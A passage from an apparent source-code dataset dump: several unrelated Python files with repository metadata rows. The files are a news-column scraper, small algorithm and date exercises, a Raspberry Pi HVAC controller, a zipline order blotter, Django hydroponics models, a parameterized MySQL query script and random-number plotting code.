hits=hitsinfo[0]
desc=hitsinfo[1]
titlesnip=bulktext.split('<meta name="og:title" content="')[1].split('"')[0]
title=titlesnip.strip()
linkedtitle='<a href="'+url+'">'+title+'</a>'
authorsnip=bulktext.split('<p class="author"><strong>')[1].split('</strong> </p>')[0]
author=authorsnip.strip()
dateregex=r'(\d{2}\/\d{2}\/\d{2}) - \d{2}:\d{2}'
datesnip=re.findall(dateregex, bulktext)[0]
datesnipdiv=datesnip.split('/')
day=datesnipdiv[0]
month=datesnipdiv[1]
year='20'+datesnipdiv[2] #This will work until year 2100
date=year+month+day
for i in (source, title, author, date):
print(i)
return (linkedtitle, str(hits), source, date, author, desc)
###end prensalibre
###semana
def semanagenerator():
listofurls=[]
caturl='http://www.semana.com/seccion/opinion-online/81-1'
catpage=fetchURL(caturl).read().decode('utf8')
relchunk=catpage.split('<div id="espacioColumnistas" >')[1]
relchunk=relchunk.split('<!--hasta aca se carga la sección-->')[0]
urlregex=r'<a href="(http:\/\/www\.semana\.com\/opinion\/articulo\/\S+)"'
listofurls+=re.findall(urlregex, relchunk)
listofurls=set(listofurls)
for url in listofurls:
parsethis=semanareader(url)
hits=int(parsethis[1])
if hits>threshold:
logRow(parsethis)
def semanareader(url):
source='Semana (CO)'
bulktext=fetchURL(url).read().decode('utf8', errors='replace')
actualtext=bulktext.split('<div class="container_article" id="contents" >')
actualtext=actualtext[1].split('<!-- Recs&ads widget start -->')[0]
hitsinfo=hitcounter(actualtext)
hits=hitsinfo[0]
desc=hitsinfo[1]
titlesnip=bulktext.split('<meta property="ps:title" content="')[1].split('"')[0]
title=titlesnip.strip()
linkedtitle='<a href="'+url+'">'+title+'</a>'
authorsnip=bulktext.split('<meta property="ps:author" content="')[1].split('"')[0]
author=authorsnip.strip()
datesnip=bulktext.split('<meta name="cXenseParse:recs:articlepublicationdate" content="')[1].split('"')[0]
datesnip=datesnip.split(' ')[0]
datesnipdiv=datesnip.split('/')
date=datesnipdiv[-1]+datesnipdiv[-2]+datesnipdiv[-3]
for i in (source, title, author, date):
print(i)
return (linkedtitle, str(hits), source, date, author, desc)
###end semana
###EXECUTION COMMANDS
startLog()
claringenerator()
elcomercioPEgenerator()
elespectadorgenerator()
elmercuriogenerator()
elnacionalgenerator()
elpaisgenerator()
eltiempogenerator()
eluniversalgenerator()
eluniversogenerator()
excelsiorgenerator()
lanaciongenerator()
mileniogenerator()
prensalibregenerator()
semanagenerator()
endLog()
| [
"orgullomoore@gmail.com"
] | orgullomoore@gmail.com |
fadcabb3f730cb88d0fc2352df06bd1a08b79edb | 4a4e214268df1ba7b24c1ee4e7a4439055e5d0f2 | /k_closest_points_using_heapmax.py | b69c010979f4ac4cc612d708a42f143e0bbe4f01 | [] | no_license | arturoaviles/k_closest_points | 5a1fc3b0bd024f600f039fa837e3b957bc7b6a9a | 9d9c315ca615f016908a7641ff4ad6b56c06f1b6 | refs/heads/master | 2020-04-30T21:30:15.325606 | 2019-03-22T07:42:16 | 2019-03-22T07:42:16 | 177,094,427 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 789 | py | import heapq
points = [
(-2, -4), (0, -2), (-1, 0), (3, -5), (-2, -3), (3, 2)
] * 2000000
def closest_points(points, k):
# print(points)
arr = []
for coordinates in points:
x = coordinates[0]
y = coordinates[1]
d = (x ** 2 + y ** 2) ** 1/2
target = tuple((d, x, y))
arr.append(target)
# print(arr)
# O(n)
k_distances = arr[:k]
heapq._heapify_max(k_distances)
# O(k)
for distances_after_k in arr[k:]: # O(k-n)
if distances_after_k[0] < k_distances[0][0]:
k_distances[0] = distances_after_k # ->
heapq._heapify_max(k_distances) # O(logk)
# O([n-k]*logk)
# print("\n\n")
return k_distances[::-1]
print(closest_points(points, 3)) # O(n + (n-k)*log(k))
| [
"aaviles@nearshoremx.com"
] | aaviles@nearshoremx.com |
84a2a9db3cd847433912ae84459035f42045f6bc | da3e36172daaf863ef73372f8c36cc2629ec1769 | /UMDC/03/17g.py | ce55196990dd77c97e38c5ebc70122baad56ce1d | [] | no_license | mentecatoDev/python | 08eef1cb5a6ca2f16b01ee98192ccf1a65b9380a | 80ddf541d3d1316ba8375db8f6ec170580e7831b | refs/heads/master | 2021-06-30T07:03:51.957376 | 2021-02-22T09:40:46 | 2021-02-22T09:40:46 | 222,322,503 | 3 | 4 | null | null | null | null | UTF-8 | Python | false | false | 2,333 | py | """
Ejercicio 17g
Escribir funciones que resuelvan los siguientes problemas:
g) Dadas dos fechas (dia1, mes1, año1, dia2, mes2, año2), indicar el tiempo
transcurrido entre ambas, en años, meses y dias. Nota: en todos los casos,
involucrar las funciones escritas previamente cuando sea posible.
"""
def bisiesto(anio):
"""Devuelve True si el anio es bisiesto."""
if anio % 4:
return False
else:
if anio % 100:
return True
else:
if anio % 400:
return False
else:
return True
def dias_mes(mes, anio):
"""Devuelve los días de cualquier mes teniendo en cuenta el anio."""
if mes in (1, 3, 5, 7, 8, 10, 12):
return 31
elif mes in (4, 6, 9, 11):
return 30
elif mes == 2:
if bisiesto(anio):
return 29
else:
return 28
else:
return -1
def validar_fecha(dia, mes, anio):
dm = dias_mes(mes, anio)
if dm == -1:
return -1
if dm < dia:
return False
elif mes > 12:
return False
else:
return True
def dias_faltan(dia, mes, anio):
if validar_fecha(dia, mes, anio):
return dias_mes(mes, anio)-dia
else:
return -1
print(dias_faltan(1, 1, 2000))
def dias_fin_anio(dia, mes, anio):
if validar_fecha(dia, mes, anio):
dias = 0
for m in range(mes+1, 12+1):
dias += dias_mes(m, anio)
dias += dias_faltan(dia, mes, anio)
return dias
else:
return -1
def dias_principio(dia, mes, anio):
if validar_fecha(dia, mes, anio):
if bisiesto(anio):
return 365 - dias_fin_anio(dia, mes, anio)
else:
return 364 - dias_fin_anio(dia, mes, anio)
else:
return -1
def dias_transcurridos(dia1, mes1, anio1, dia2, mes2, anio2):
if anio1 == anio2:
total = -dias_principio(dia1, mes1, anio1) + \
dias_principio(dia2, mes2, anio2)
else:
total = dias_fin_anio(dia1, mes1, anio1) + \
dias_principio(dia2, mes2, anio2)+1
for a in range(anio1+1, anio2):
if bisiesto(a):
total += 366
else:
total += 365
return total
print(dias_transcurridos(1, 1, 2001, 31, 12, 2002))
| [
"favila@iesromerovargas.com"
] | favila@iesromerovargas.com |
c63356a685b663f6948f971cbbea4317c9ee4d59 | bc46638835f1f248550b05c49450ef6e632cec50 | /Ubidots-Finaltest.py | 460b2ba2c49049a7be2c04efd128cd3d75ec97d5 | [
"MIT"
] | permissive | shijiediqiucunzj/Energy-Management-of-HVAC-Systems | e9da10104b8a1a5a509ec119ded2319356b7dc3b | 64fced60248500ab59e953ad7628ccc533cf983e | refs/heads/master | 2022-07-23T23:04:20.685016 | 2017-05-28T08:50:45 | 2017-05-28T08:50:45 | 182,559,359 | 0 | 0 | MIT | 2022-06-02T21:22:30 | 2019-04-21T16:53:46 | Python | UTF-8 | Python | false | false | 4,091 | py | # FYP2017
# Program to establish ZigBee communication between raspberry Pi and arduino
# Complete control of HVAC elements based on commands sent from the Pi
# Author: Kunal Jagadeesh
# License: Public Domain
import time
import serial
from ubidots import ApiClient
one = 1
zero = 0
f = open('Ubidots_APIkey.txt', 'r')
apikey = f.readline().strip()
f.close()
api = ApiClient(token = apikey)
try:
roomtemp = api.get_variable("58d763b8762542260a851bd1")
roomhumidity = api.get_variable("58d763c57625422609b8d088")
cooler = api.get_variable("58d768e0762542260a855c7a")
heater = api.get_variable("58d768eb7625422609b91152")
humidifier = api.get_variable("58d768f8762542260cf3b292")
exhaust = api.get_variable("58d76907762542260dfad769")
except ValueError:
print('Unable to obtain variable')
cooler.save_value({'value': 0})
heater.save_value({'value': 0})
humidifier.save_value({'value': 0})
exhaust.save_value({'value': 0})
hour = 3600
PORT = '/dev/ttyUSB0'
BAUD_RATE = 9600
# Open serial port
ser = serial.Serial(PORT, BAUD_RATE)
def getSensorData():
if ser.isOpen():
ser.close()
ser.open()
ser.isOpen()
ser.write('s'.encode())
time.sleep(2)
response = ser.readline().strip().decode()
hum = float(response[:5])
temp = float(response[5:])
try:
roomtemp.save_value({'value': temp})
roomhumidity.save_value({'value': hum})
print('Value',temp,'and',hum, 'sent')
time.sleep(2)
except:
print('Value not sent')
return (hum, temp)
def level_1():
h, t = getSensorData()
if (t > 35):
cooler.save_value({'value': one})
time.sleep(2)
if (t < 15):
heater.save_value({'value': one})
time.sleep(2)
if (h < 25):
humidifier.save_value({'value': one})
time.sleep(2)
if (h > 80):
exhaust.save_value({'value': one})
time.sleep(2)
time.sleep(10)
cooler.save_value({'value': 0})
heater.save_value({'value': 0})
humidifier.save_value({'value': 0})
exhaust.save_value({'value': 0})
def level_2():
h, t = getSensorData()
if (t > 32):
cooler.save_value({'value': one})
time.sleep(2)
if (t < 18):
heater.save_value({'value': one})
time.sleep(2)
if (h < 30):
humidifier.save_value({'value': one})
time.sleep(2)
if (h > 70):
exhaust.save_value({'value': one})
time.sleep(2)
time.sleep(10)
cooler.save_value({'value': 0})
heater.save_value({'value': 0})
humidifier.save_value({'value': 0})
exhaust.save_value({'value': 0})
def level_3():
h, t = getSensorData()
if (t > 30):
cooler.save_value({'value': one})
time.sleep(2)
if (t < 20):
heater.save_value({'value': one})
time.sleep(2)
if (h < 40):
humidifier.save_value({'value': one})
time.sleep(2)
if (h > 60):
exhaust.save_value({'value': one})
time.sleep(2)
time.sleep(10)
cooler.save_value({'value': 0})
heater.save_value({'value': 0})
humidifier.save_value({'value': 0})
exhaust.save_value({'value': 0})
def level_4():
h, t = getSensorData()
if (t > 27):
cooler.save_value({'value': one})
time.sleep(2)
if (t < 22):
heater.save_value({'value': one})
time.sleep(2)
if (h < 25):
humidifier.save_value({'value': one})
time.sleep(2)
if (h > 30):
exhaust.save_value({'value': one})
time.sleep(2)
time.sleep(10)
cooler.save_value({'value': 0})
heater.save_value({'value': 0})
humidifier.save_value({'value': 0})
exhaust.save_value({'value': 0})
def getLevel():
return 4
if __name__ == "__main__":
level = getLevel()
while True:
if (level == 1):
level_1()
elif (level == 2):
level_2()
elif (level == 3):
level_3()
elif (level == 4):
level_4()
else:
ser.write('x'.encode())
break
| [
"kunal.jagadish07@gmail.com"
] | kunal.jagadish07@gmail.com |
f3a8f4fa0afc7f7f1ea26142d7b365249322a846 | 395b49dd992103e905c97a7b569eb21c1e887791 | /rectangulo.py | aeaef65359087b466480797c97c8026cff31b50b | [] | no_license | joshuaavalos74/Ejercicios-en-clase-2017 | e728995e05b42e9a30d7fd73e5454ab8ff60c898 | 34789d0a3e17fab55039224e438f7f9f336fecde | refs/heads/master | 2021-01-11T19:17:48.730605 | 2017-09-05T16:19:50 | 2017-09-05T16:19:50 | 79,346,427 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 83 | py | def rec(alt,anch):
r=""
for i in range (0,alt):
r+= ("*"*anch)+"\n"
return r
| [
"joshuaavalos74@gmail.com"
] | joshuaavalos74@gmail.com |
c861a7bd871a32d79e69a95945186ca90b111af0 | 5e97b099899704a7525b6b0ce98dcf761bbf6763 | /finance/blotter.py | fb88f514a7cc740df3298d08fe4c58a43bc73f56 | [] | no_license | fswzb/zipline | 004d76d1658ec9185c125de96513e7312923205f | a504049d46f0d4518375b525c7b6ae083b4a3ea0 | refs/heads/master | 2020-05-23T10:20:57.972088 | 2017-01-12T17:23:27 | 2017-01-12T17:23:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,740 | py | #
# Copyright 2014 Quantopian, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import math
import uuid
from copy import copy
from logbook import Logger
from collections import defaultdict
from six import text_type
import zipline.errors
import zipline.protocol as zp
from zipline.finance.slippage import (
MySlippage,
transact_partial,
check_order_triggers
)
from zipline.finance.commission import PerDollar_A
log = Logger('Blotter')
from zipline.utils.protocol_utils import Enum
ORDER_STATUS = Enum(
'OPEN',
'FILLED',
'CANCELLED'
)
class Blotter(object):
def __init__(self):
self.transact = transact_partial(MySlippage(0.1,0.0), PerDollar_A())
# these orders are aggregated by sid
self.open_orders = defaultdict(list)
# keep a dict of orders by their own id
self.orders = {}
# holding orders that have come in since the last
# event.
self.new_orders = []
self.current_dt = None
self.max_shares = int(1e+11)
def __repr__(self):
return """
{class_name}(
transact_partial={transact_partial},
open_orders={open_orders},
orders={orders},
new_orders={new_orders},
current_dt={current_dt})
""".strip().format(class_name=self.__class__.__name__,
transact_partial=self.transact.args,
open_orders=self.open_orders,
orders=self.orders,
new_orders=self.new_orders,
current_dt=self.current_dt)
def set_date(self, dt):
self.current_dt = dt
def order(self, sid, amount, style, order_id=None):
# something could be done with amount to further divide
# between buy by share count OR buy shares up to a dollar amount
# numeric == share count AND "$dollar.cents" == cost amount
"""
amount > 0 :: Buy/Cover
amount < 0 :: Sell/Short
Market order: order(sid, amount)
Limit order: order(sid, amount, LimitOrder(price))
Stop order: order(sid, amount, StopOrder(price))
StopLimit order: order(sid, amount, StopLimitOrder(price))
"""
if amount == 0:
# Don't bother placing orders for 0 shares.
return
elif amount > self.max_shares:
# Arbitrary limit of 100 billion (US) shares will never be
# exceeded except by a buggy algorithm.
raise OverflowError("Can't order more than %d shares" %
self.max_shares)
is_buy = (amount > 0)
order = Order(
dt=self.current_dt,
sid=sid,
amount=amount,
stop=style.get_stop_price(is_buy),
limit=style.get_limit_price(is_buy),
id=order_id
)
self.open_orders[order.sid].append(order)
#print "blotter111: just placed new order, current open_orders: \n"
#print(self.open_orders[order.sid])
self.orders[order.id] = order
self.new_orders.append(order)
return order.id
def cancel(self, order_id):
if order_id not in self.orders:
return
cur_order = self.orders[order_id]
if cur_order.open:
order_list = self.open_orders[cur_order.sid]
if cur_order in order_list:
order_list.remove(cur_order)
if cur_order in self.new_orders:
self.new_orders.remove(cur_order)
cur_order.cancel()
cur_order.dt = self.current_dt
# we want this order's new status to be relayed out
# along with newly placed orders.
self.new_orders.append(cur_order)
def process_split(self, split_event):
if split_event.sid not in self.open_orders:
return
orders_to_modify = self.open_orders[split_event.sid]
for order in orders_to_modify:
order.handle_split(split_event)
def process_trade(self, trade_event, cash):
if trade_event.type != zp.DATASOURCE_TYPE.TRADE:
return
if trade_event.sid not in self.open_orders:
return
if trade_event.volume < 1 or math.isnan(trade_event.volume):
# there are zero volume trade_events bc some stocks trade
# less frequently than once per minute.
return
orders = self.open_orders[trade_event.sid]
orders = sorted(orders, key=lambda o: o.dt)
# Only use orders for the current day or before
current_orders = filter(
lambda o: o.dt <= trade_event.dt,
orders)
#print "blotter160: current orders that go into process_txn: \n"
#print(current_orders)
for txn, order in self.process_transactions(trade_event,
current_orders,
cash):
yield txn, order
#print "order amount after process_txn: %s\n"%order.amount
#print "order filled: %s\n"%order.filled
#print "order open_amount after process_txn: %s\n"%order.open_amount
# update the open orders for the trade_event's sid
self.open_orders[trade_event.sid] = \
[order for order
in self.open_orders[trade_event.sid]
if order.open]
def process_transactions(self, trade_event, current_orders, cash):
for order, txn in self.transact(trade_event, current_orders, cash):
if txn.type == zp.DATASOURCE_TYPE.COMMISSION:
order.commission = (order.commission or 0.0) + txn.cost
else:
if txn.amount == 0:
raise zipline.errors.TransactionWithNoAmount(txn=txn)
if math.copysign(1, txn.amount) != order.direction:
raise zipline.errors.TransactionWithWrongDirection(
txn=txn, order=order)
if abs(txn.amount) > abs(self.orders[txn.order_id].amount):
raise zipline.errors.TransactionVolumeExceedsOrder(
txn=txn, order=order)
order.filled += txn.amount
if txn.commission is not None:
order.commission = ((order.commission or 0.0)
+ txn.commission)
# mark the date of the order to match the transaction
# that is filling it.
order.dt = txn.dt
yield txn, order
class Order(object):
def __init__(self, dt, sid, amount, stop=None, limit=None, filled=0,
commission=None, id=None):
"""
@dt - datetime.datetime that the order was placed
@sid - stock sid of the order
@amount - the number of shares to buy/sell
a positive sign indicates a buy
a negative sign indicates a sell
@filled - how many shares of the order have been filled so far
"""
# get a string representation of the uuid.
self.id = id or self.make_id()
self.dt = dt
self.created = dt
self.sid = sid
self.amount = amount
self.filled = filled
self.commission = commission
self._cancelled = False
self.stop = stop
self.limit = limit
self.stop_reached = False
self.limit_reached = False
self.direction = math.copysign(1, self.amount)
self.type = zp.DATASOURCE_TYPE.ORDER
def make_id(self):
return uuid.uuid4().hex
def to_dict(self):
py = copy(self.__dict__)
for field in ['type', 'direction', '_cancelled']:
del py[field]
py['status'] = self.status
return py
def to_api_obj(self):
pydict = self.to_dict()
obj = zp.Order(initial_values=pydict)
return obj
def check_triggers(self, event):
"""
Update internal state based on price triggers and the
trade event's price.
"""
stop_reached, limit_reached, sl_stop_reached = \
check_order_triggers(self, event)
if (stop_reached, limit_reached) \
!= (self.stop_reached, self.limit_reached):
self.dt = event.dt
self.stop_reached = stop_reached
self.limit_reached = limit_reached
if sl_stop_reached:
# Change the STOP LIMIT order into a LIMIT order
self.stop = None
def handle_split(self, split_event):
ratio = split_event.ratio
# update the amount, limit_price, and stop_price
# by the split's ratio
# info here: http://finra.complinet.com/en/display/display_plain.html?
# rbid=2403&element_id=8950&record_id=12208&print=1
# new_share_amount = old_share_amount / ratio
# new_price = old_price * ratio
self.amount = int(self.amount / ratio)
if self.limit is not None:
self.limit = round(self.limit * ratio, 2)
if self.stop is not None:
self.stop = round(self.stop * ratio, 2)
@property
def status(self):
if self._cancelled:
return ORDER_STATUS.CANCELLED
return ORDER_STATUS.FILLED \
if not self.open_amount else ORDER_STATUS.OPEN
def cancel(self):
self._cancelled = True
@property
def open(self):
return self.status == ORDER_STATUS.OPEN
@property
def triggered(self):
"""
For a market order, True.
For a stop order, True IFF stop_reached.
For a limit order, True IFF limit_reached.
"""
if self.stop is not None and not self.stop_reached:
return False
if self.limit is not None and not self.limit_reached:
return False
return True
@property
def open_amount(self):
return self.amount - self.filled
def __repr__(self):
"""
String representation for this object.
"""
return "Order(%s)" % self.to_dict().__repr__()
def __unicode__(self):
"""
Unicode representation for this object.
"""
return text_type(repr(self))
| [
"liu.jy.nku@gmail.com"
] | liu.jy.nku@gmail.com |
4cdb8d4ce152583225c607c387d527a82eced8d3 | 7c9707f0f1cb8e633ac605934f3dbd8036790868 | /projet/rpi_manager/models.py | f61c7c196096c5f2351a5ccd5919b2269e0b3f2e | [] | no_license | ometeore/hydropo | 891e1abd4c1b8ccd0a3b27a043abf894b70ceb5b | 324076d4b7ddbd14e718c424eb24d129c2a2243c | refs/heads/master | 2023-06-14T08:35:55.838469 | 2021-07-04T16:28:09 | 2021-07-04T16:28:09 | 290,198,666 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,146 | py | from django.db import models
from django import forms
from datetime import datetime
from channels.layers import get_channel_layer
from asgiref.sync import async_to_sync
class Rpi(models.Model):
name = models.CharField(max_length=200)
uid_name = models.CharField(max_length=200)
last_connect = models.DateTimeField()
is_conected = models.BooleanField()
# plutot que de comparer des str sources de bugs
# import datetime
# regler le passage a minuit aussi
# date_time_obj = datetime.datetime.strptime(date_time_str, '%Y-%m-%d %H:%M:%S.%f')
def compare_time(self, begin_test, end_test, cat):
if cat:
schedule = self.water.all()
else:
schedule = self.lights.all()
for times in schedule:
if begin_test > str(times.begin) and begin_test < str(times.end):
return False
if end_test > str(times.begin) and end_test < str(times.end):
return False
if begin_test < str(times.begin) and end_test > str(times.end):
return False
return True
def broadcast_schedule(self):
message = {}
message["manual"] = False
schedule_water_list = [
[str(elm.begin), str(elm.end)] for elm in self.water.all()
]
message["water"] = schedule_water_list
schedule_lights_list = [
[str(elm.begin), str(elm.end)] for elm in self.lights.all()
]
message["lights"] = schedule_lights_list
objectif_ph = self.ph.filter(objectif=True)
message["ph"] = objectif_ph[0].value
objectif_ec = self.ec.filter(objectif=True)
message["ec"] = objectif_ec[0].value
####### This part is sending the message to the websocket in group call "group0"
channel_layer = get_channel_layer()
async_to_sync(channel_layer.group_send)(
self.uid_name, {"type": "send_message", "message": message}
)
def broadcast_manual(self, tool):
message = {}
message["manual"] = True
message["tool"] = tool
print("ASK FOR MANUAL MODE FOR ID: {}".format(self.uid_name))
print(message)
channel_layer = get_channel_layer()
async_to_sync(channel_layer.group_send)(
self.uid_name, {"type": "send_message", "message": message}
)
class WaterSchedule(models.Model):
begin = models.TimeField()
end = models.TimeField()
rpi = models.ForeignKey(Rpi, on_delete=models.CASCADE, related_name="water")
class LightSchedule(models.Model):
begin = models.TimeField()
end = models.TimeField()
rpi = models.ForeignKey(Rpi, on_delete=models.CASCADE, related_name="lights")
class Ph(models.Model):
date = models.DateTimeField()
value = models.FloatField()
objectif = models.BooleanField()
rpi = models.ForeignKey(Rpi, on_delete=models.CASCADE, related_name="ph")
class Ec(models.Model):
date = models.DateTimeField()
value = models.IntegerField()
objectif = models.BooleanField()
rpi = models.ForeignKey(Rpi, on_delete=models.CASCADE, related_name="ec")
| [
"pilt64@hotmail.fr"
] | pilt64@hotmail.fr |
95414f7ed3b48f7baf6bd13799ea4698d7f6093f | 199522cb43b4e2c7e3bf034a0e604794258562b1 | /0x0F-python-object_relational_mapping/3-my_safe_filter_states.py | 3659d402edd14791ff0d3dce555884770499752c | [] | no_license | jormao/holbertonschool-higher_level_programming | a0fd92f2332f678e6fe496057c04f2995d24a4ac | 360b3a7294e9e0eadcadb57d4c48c22369c05111 | refs/heads/master | 2020-09-29T01:36:20.094209 | 2020-05-15T03:27:06 | 2020-05-15T03:27:06 | 226,915,744 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 607 | py | #!/usr/bin/python3
"""
script that takes in arguments and displays all values in the
states table of hbtn_0e_0_usa where name matches the argument.
But this time, write one that is safe from MySQL injections!
"""
import MySQLdb
from sys import argv
if __name__ == "__main__":
db = MySQLdb.connect(host="localhost", port=3306, user=argv[1],
passwd=argv[2], db=argv[3])
cur = db.cursor()
cur.execute("SELECT * FROM states\
WHERE name = %s\
ORDER BY id", (argv[4],))
rows = cur.fetchall()
for row in rows:
print(row)
cur.close()
db.close()
| [
"jormao@gmail.com"
] | jormao@gmail.com |
83b4ab7c3c4da8d9afb08d03fde9608fa04f4c09 | ea8e945af461ae6e5a2dcd9dce244391f14ec695 | /yamaguchi/chapter01/knock06.py | 60935e99d3fdfeb6fd7aaa78c8b5e626065af9d7 | [] | no_license | tmu-nlp/100knock2020 | b5a98485e52b88003fa97966c8d6eef292c9f036 | 1133fa833ea32ad3e54833e420bcb1433f3ec2f3 | refs/heads/master | 2023-04-09T06:48:04.571566 | 2020-08-13T05:38:25 | 2020-08-13T05:38:25 | 258,825,143 | 1 | 2 | null | 2020-08-12T15:56:56 | 2020-04-25T16:43:13 | Python | UTF-8 | Python | false | false | 371 | py | def n_gram(target, n):
return [target[idx:idx + n] for idx in range(len(target) - n + 1)]
text_1 = "paraparaparadise"
text_2 = "paragraph"
X = n_gram(text_1, 2)
Y = n_gram(text_2, 2)
print(f'和集合: {set(X) | set(Y)}')
print(f'積集合: {set(X) & set(Y)}')
print(f'差集合: {set(X) - set(Y)}')
print("判定: " + str('se' in (set(X) & set(Y)))) | [
"noreply@github.com"
] | noreply@github.com |
c026b6ef4d2e37bdbbe47238b809473c7ddfcf8e | d28ab4b215eda33a64dc81e40c824bc008680c18 | /python practice/Heap/373_find_k_pairs_with_smallest_sums.py | 43bea98c5177694695521bdaf8482168ff44fad2 | [] | no_license | SuzyWu2014/coding-practice | f7efc88c78877b841a4fcc8863a39223eca4c307 | 41365b549f1e6b04aac9f1632a66e71c1e05b322 | refs/heads/master | 2021-01-23T22:15:34.330828 | 2016-12-13T05:16:10 | 2016-12-13T05:16:10 | 58,106,714 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,867 | py | # 373. Find K Pairs with Smallest Sums
# You are given two integer arrays nums1 and nums2 sorted in ascending order and an integer k.
# Define a pair (u,v) which consists of one element from the first array and one element from the second array.
# Find the k pairs (u1,v1),(u2,v2) ...(uk,vk) with the smallest sums.
# Example 1:
# Given nums1 = [1,7,11], nums2 = [2,4,6], k = 3
# Return: [1,2],[1,4],[1,6]
# The first 3 pairs are returned from the sequence:
# [1,2],[1,4],[1,6],[7,2],[7,4],[11,2],[7,6],[11,4],[11,6]
# Example 2:
# Given nums1 = [1,1,2], nums2 = [1,2,3], k = 2
# Return: [1,1],[1,1]
# The first 2 pairs are returned from the sequence:
# [1,1],[1,1],[1,2],[2,1],[1,2],[2,2],[1,3],[1,3],[2,3]
# Example 3:
# Given nums1 = [1,2], nums2 = [3], k = 3
# Return: [1,3],[2,3]
# All possible pairs are returned from the sequence:
# [1,3],[2,3]
import heapq
class Solution(object):
def kSmallestPairs(self, nums1, nums2, k):
"""
:type nums1: List[int]
:type nums2: List[int]
:type k: int
:rtype: List[List[int]]
"""
k = min(k, len(nums1) * len(nums2))
if k == 0:
return []
rst = []
heap = []
i, j = 0, 0
for i in range(min(k, len(nums1))):
heapq.heappush(heap, (nums1[i] + nums2[0], i, 0))
while len(rst) < k:
min_sum, i, j = heapq.heappop(heap)
rst.append([nums1[i], nums2[j]])
if j + 1 < len(nums2):
heapq.heappush(heap, (nums1[i] + nums2[j + 1], i, j + 1))
return rst
print Solution().kSmallestPairs([1, 2, 4, 5, 6], [3, 5, 7, 9], 3)
# print Solution().kSmallestPairs([1, 7, 11], [2, 4, 6], 3)
# print Solution().kSmallestPairs([1, 1, 2], [1, 2, 3], 2)
# print Solution().kSmallestPairs([1, 2], [3], 3)
# print Solution().kSmallestPairs([], [], 3)
| [
"shujinwu@oregonstate.edu"
] | shujinwu@oregonstate.edu |
03a6dcc503549409d4e92b79d56834442c467eaf | ddef88284b7ec08364f99b43d74a99410f49303e | /code/Assignment1_2D_RNG/2DRandomNoGens.py | 19636408deeb9df085d1eacb297e2e2b13a0fc7e | [] | no_license | IDS6145-Fall2019/assignment1-amajoy | 6f9094eb126055daf6fe9b4dcc162ca74abd7f7f | 5fb31ba4271f6f35b47c5c72e67ca136bb7ead82 | refs/heads/master | 2020-07-23T01:00:41.524726 | 2019-09-24T00:20:11 | 2019-09-24T00:20:11 | 207,392,730 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,450 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Sep 21 21:54:35 2019
@author: Amanda
"""
import matplotlib.pyplot as plt
import random
import sobol_seq
#time to make plots - I can't figure out how to for loop this
#Pseudo-Random up top
plt.subplot(2, 5, 1)
x100 = [random.uniform(0,4) for x in range(100)]
y100 = [random.uniform(0,4) for x in range(100)]
plt.title("N=100")
plt.ylabel("Pseudo-Random")
plt.scatter(x100, y100, s=1, marker = '.')
plt.yticks([])
plt.xticks([])
plt.subplot(2, 5, 2)
x500 = [random.uniform(0,4) for x in range(500)]
y500 = [random.uniform(0,4) for x in range(500)]
plt.title("N=500")
plt.scatter(x500, y500, s=1, marker = '.')
plt.yticks([])
plt.xticks([])
plt.subplot(2, 5, 3)
x1k = [random.uniform(0,4) for x in range(1000)]
y1k = [random.uniform(0,4) for x in range(1000)]
plt.title("N=1000")
plt.scatter(x1k, y1k, s=1, marker = '.')
plt.yticks([])
plt.xticks([])
plt.subplot(2, 5, 4)
x2k = [random.uniform(0,4) for x in range(2000)]
y2k = [random.uniform(0,4) for x in range(2000)]
plt.title("N=2000")
plt.scatter(x2k, y2k, s=1, marker = '.')
plt.yticks([])
plt.xticks([])
plt.subplot(2, 5, 5)
x5k = [random.uniform(0,4) for x in range(5000)]
y5k = [random.uniform(0,4) for x in range(5000)]
plt.title("N=5000")
plt.scatter(x5k, y5k, s=1, marker = '.')
plt.yticks([])
plt.xticks([])
#Quasi-Random goes down here. Fingers crossed.
plt.subplot(2, 5, 6)
sobol_100_x = sobol_seq.i4_sobol_generate(4, 100)
x100 = sobol_100_x[:,0]
y100 = sobol_100_x[:,1]
plt.ylabel("Quasi Random")
plt.scatter(x100, y100, s=1, marker = '.')
plt.yticks([])
plt.xticks([])
plt.subplot(2, 5, 7)
sobol_500_x = sobol_seq.i4_sobol_generate(4, 500)
x500 = sobol_500_x[:,0]
y500 = sobol_500_x[:,1]
plt.scatter(x500, y500, s=1, marker = '.')
plt.yticks([])
plt.xticks([])
plt.subplot(2, 5, 8)
sobol_1000_x = sobol_seq.i4_sobol_generate(4, 1000)
x1k = sobol_1000_x[:,0]
y1k = sobol_1000_x[:,1]
plt.scatter(x1k, y1k, s=1, marker = '.')
plt.yticks([])
plt.xticks([])
plt.subplot(2, 5, 9)
sobol_2000_x = sobol_seq.i4_sobol_generate(4, 2000)
x2k = sobol_2000_x[:,0]
y2k = sobol_2000_x[:,1]
plt.scatter(x2k, y2k, s=1, marker = '.')
plt.yticks([])
plt.xticks([])
plt.subplot(2, 5, 10)
sobol_5000_x = sobol_seq.i4_sobol_generate(4, 5000)
x5k = sobol_5000_x[:,0]
y5k = sobol_5000_x[:,1]
plt.scatter(x5k, y5k, s=1, marker = '.')
plt.yticks([])
plt.xticks([])
plt.savefig("Plotting 2D RNG.png")
| [
"noreply@github.com"
] | noreply@github.com |
